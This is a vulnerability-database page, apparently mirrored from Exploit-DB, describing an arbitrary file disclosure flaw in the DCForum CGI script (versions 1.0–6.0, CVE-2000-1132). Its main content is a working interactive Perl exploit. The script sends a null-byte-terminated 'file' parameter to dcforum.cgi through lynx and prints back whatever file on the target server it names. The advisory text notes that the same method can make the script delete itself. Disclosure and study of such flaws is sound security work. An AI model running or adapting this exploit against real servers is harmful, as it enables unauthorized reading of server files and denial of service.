Lucene search
+L

DCForum 1-6 - Arbitrary File Disclosure

🗓️ 14 Nov 2000 00:00:00Reported by steeLeType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 35 Views

DCForum script exposes files to unauthorized access and allows denial-of-service attacks.

Related
Code
ReporterTitlePublishedViews
Family
Tenable Nessus
cgforum.cgi Multiple Vulnerabilities
20 Aug 200400:00
nessus
Tenable Nessus
Multiple Dangerous CGI Script Detection
17 Jun 200300:00
nessus
CVE
CVE-2000-1132
22 Jan 200105:00
cve
Cvelist
CVE-2000-1132
22 Jan 200105:00
cvelist
EUVD
EUVD-2000-1117
7 Oct 202500:30
euvd
NVD
CVE-2000-1132
9 Jan 200105:00
nvd
OpenVAS
Detection of various dangerous CGI scripts (HTTP) - Active Check
3 Nov 200500:00
openvas
# source: https://www.securityfocus.com/bid/1951/info
#
# DCForum is a commercial cgi script from DCScripts which is designed to facilitate web-based threaded discussion forums.
#
#The script improperly validates user-supplied input, which allows the remote viewing of arbitrary files on the host which are readable by user 'nobody' or the webserver. Additionally, it has been reported that the dcforum.cgi script can be made to delete itself if the attacker attempts to read its source code using this method, effectively permitting a denial-of-service attack.
#

#!/usr/bin/perl
# DC Forum Vulnerablitiy(Found In Versions From 1.0 - 6.0 According To
CGISecurity.com Advisory)
# Exploits Vulnerability That Allows Remote File Reading
# By SteeLe
# BEGIN { open(STDERR,">errors.txt"); } error checking
$lynx = "/usr/bin/lynx"; # specify

$site = $ARGV[0];
$cgi  = $ARGV[1];
$inet = inet_aton($site);

die "\n\t---   Usage:$0 <site> <cgi location,duh>  ---" if(@ARGV == '0' ||
@ARGV < 2);

print "\n\t---   DCForum 1.0 - 6.0 Exploit ---";
print "\n\t---   By the cool fellas at *   ---\n\n";

while(true) { # yea i think I stole this from the pollex.pl , uh thanks.

print "[dcforum]Option:";
$action = <STDIN>;
chomp($action);

print "Valid Options: r(read files, usage r <file>), q(quit)\n" if($action
ne "r" || $action ne "q");

if ($action eq "r") {
print "\nFile(to read):";
$file = <STDIN>;
chomp($file);
# Old fashion shit, and I was lazy so be happy
$url = "?az=list&file=$file%00";
$site = `$lynx http://$site$cgi$url`;
print $site;
}
elsif ($action eq "q") {
 print "now exiting program\n";
 exit;
  }
}
# (c) 2000 [Warez To Tha Extreme(Damn Thats A Lie)]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Oct 2017 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 26.4
EPSS0.09276
35